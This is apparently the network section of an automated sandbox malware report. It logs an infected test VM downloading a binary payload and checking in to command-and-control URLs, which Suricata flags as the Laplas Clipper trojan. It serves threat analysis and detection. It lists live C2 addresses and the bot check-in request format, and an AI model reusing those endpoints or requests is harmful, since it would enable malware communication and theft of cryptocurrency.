Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
- TCP Requests
-
-
192.168.56.103:49162 176.113.115.21:443
-
192.168.56.103:49165 176.113.115.21:443
-
192.168.56.103:49174 176.113.115.21:443
-
192.168.56.103:49182 176.113.115.21:443
-
192.168.56.103:49248 176.113.115.21:443
-
192.168.56.103:49170 176.113.115.25:80
-
192.168.56.103:49197 176.113.115.25:80
-
192.168.56.103:49199 176.113.115.25:80
-
GET
200
https://176.113.115.21/V/sdkk5ywn1w/+iBH32vcXr87CL+YROcC3SO1z8sYve4b76amRKql5QDggj0I2AbinPxGpJbUpQllBVERtRx9KxUVyC8nK1a/109MZIB7ehXnhRA3u3fF/IMK5Pu2eHFKgJD6GNFhhJ8ea3akdd9FiO9eshpO8O7kUDRwSFsJBldB2jRI6xHsPmDHX7HIWLDBV7oSpPsNqfwQg==
REQUEST
RESPONSE
BODY
GET /V/sdkk5ywn1w/+iBH32vcXr87CL+YROcC3SO1z8sYve4b76amRKql5QDggj0I2AbinPxGpJbUpQllBVERtRx9KxUVyC8nK1a/109MZIB7ehXnhRA3u3fF/IMK5Pu2eHFKgJD6GNFhhJ8ea3akdd9FiO9eshpO8O7kUDRwSFsJBldB2jRI6xHsPmDHX7HIWLDBV7oSpPsNqfwQg== HTTP/1.1
Host: 176.113.115.21
HTTP/1.0 200 OK
Server: Apache/2.4.7 (Ubuntu)
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=2FF628D37D3936A2D2D44D4E3BB02AC1
Connection: Close
Content-Length: 3661248
Connection: close
GET
200
http://176.113.115.25/bot/regex
REQUEST
RESPONSE
BODY
GET /bot/regex HTTP/1.1
Host: 176.113.115.25
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 10 Apr 2023 00:44:44 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET
200
http://176.113.115.25/bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de
REQUEST
RESPONSE
BODY
GET /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de HTTP/1.1
Host: 176.113.115.25
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 10 Apr 2023 00:44:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET
200
http://176.113.115.25/bot/regex
REQUEST
RESPONSE
BODY
GET /bot/regex HTTP/1.0
Host: 176.113.115.25
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 10 Apr 2023 00:45:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: close
GET
200
http://176.113.115.25/bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de
REQUEST
RESPONSE
BODY
GET /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de HTTP/1.0
Host: 176.113.115.25
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 10 Apr 2023 00:45:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 176.113.115.25:80 | 2039776 | ET MALWARE Laplas Clipper - SetOnline CnC Checkin | A Network Trojan was detected |
TCP 192.168.56.103:49199 -> 176.113.115.25:80 | 2039776 | ET MALWARE Laplas Clipper - SetOnline CnC Checkin | A Network Trojan was detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49162 176.113.115.21:443 |
CN=Fii Lvjfoqbbjhe/OU=Tjhv/ST=fkm/O=Kvhys/C=PP/L=Lt Jssugiiwmpduhq | CN=Fii Lvjfoqbbjhe/OU=Tjhv/ST=fkm/O=Kvhys/C=PP/L=Lt Jssugiiwmpduhq | 87:92:71:13:3a:02:ae:b8:97:8a:f0:72:78:06:b8:98:df:f4:58:91 |
Snort Alerts
No Snort Alerts